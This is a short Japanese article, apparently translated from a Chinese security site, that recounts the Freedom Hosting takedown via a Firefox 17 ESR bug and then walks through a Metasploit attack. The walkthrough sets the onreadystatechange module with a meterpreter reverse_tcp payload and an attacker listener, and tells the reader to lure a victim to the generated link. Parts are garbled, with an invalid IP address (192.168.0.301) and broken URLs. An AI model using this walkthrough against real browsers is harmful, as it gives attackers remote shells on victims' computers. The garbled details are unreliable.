Torネットワークは、ユーザーが匿名でウェブサイトやその他のサービスにアクセスできるネットワークです。このネットワーク内には、フォーラムから電子メールまで、ダークネットと呼ばれるサービスが存在し、これらのサービスにはtorを通じてのみアクセスできます。
Torは、ボランティアによって提供される3,000以上のリレーを介してネットワークトラフィックを送信し、それによって実際のユーザーの位置情報を隠します。Torネットワーク上のサービスの多くはクリーンですが、その匿名性は、児童ポルノを配布する組織など、犯罪的意図を持つ人々をも惹きつけています。
アイルランドのダブリンに住む米国生まれのエリック・エオイン・マルケスは、フリーダム・ホスティング社の最高責任者で、ヨーロッパにある550のサーバーが児童ポルノサイトのホスティングに使われているとされています。
Freedom HostingはTorネットワーク上の主要なサービスプロバイダの一つです。そのサービスはTorネットワークを通してのみアクセスできます。その違法行為の疑惑から、Torの担当者はFreedom Hostingを運営する人たちとは何の関係もないという特別声明まで出しています。声明は以下の通りです:
"フリーダムホスティングを運営する個人や組織は、torソフトウェアを開発したチームとは何の関係も所属もありません。過去に、torの隠されたサービスを迂回し、torネットワークの背後にあるサーバーのソフトウェアを直接攻撃しようとする敵対的な組織による試みがありました。これは通常、torそのものではなく、phpやmysql、その他のソフトウェアの脆弱性を悪用することで行われてきました。最近、何者かがFreedom Hostingのソフトウェアの脆弱性を悪用したことが明らかになりました。torブラウザのベースとなっているFirefoxのバージョンであるFirefox 17 ESRのバグを悪用することが知られています。これらのバグを調査し、できるだけ早く修正します。
FBIはfirefox17の脆弱性を悪用し、Freedom Hostingのサーバーを突き止めることに成功しました。使用されたペイロードは、コンピュータのMACアドレスとホスト名を収集し、それをhttpプロトコルを介して管理下のサーバーに送信し、実際のIPアドレスを取得するというものでした。
Mozilla Firefox バージョン 22.0 未満、Firefox ESR バージョン 17.x 未満、および Thunderbird ESR バージョン 17.x 未満は、onreadystatechange イベントを適切に処理しません。コードを実行される可能性があります。
windows/browser/mozilla_firefox_onreadystatechange.
この exp の設定を確認するには、show options と入力します。
SRVHOSTはmsfのローカルマシンのアドレスで、ここではSRVHOST 192.168.0.3に設定します。
次に、ペイロードセットPAYLOAD windows/meterpreter/reverse_tcpを設定します。
show options と入力すると、ペイロードの設定項目が表示されます。
バウンスシェルを受け入れるアドレスを設定 set LHOST 192.168.0.301
run:コマンドを入力してリスニングを開始します。
被害者にこのExp生成リンクにアクセスしてもらうだけです。http://...:/dO
他のブラウザが脆弱であれば、以下のようにmsfの出力を見ることができます:
http://...//////ージ
via http://..om翻译整理 by litdg@freebuf
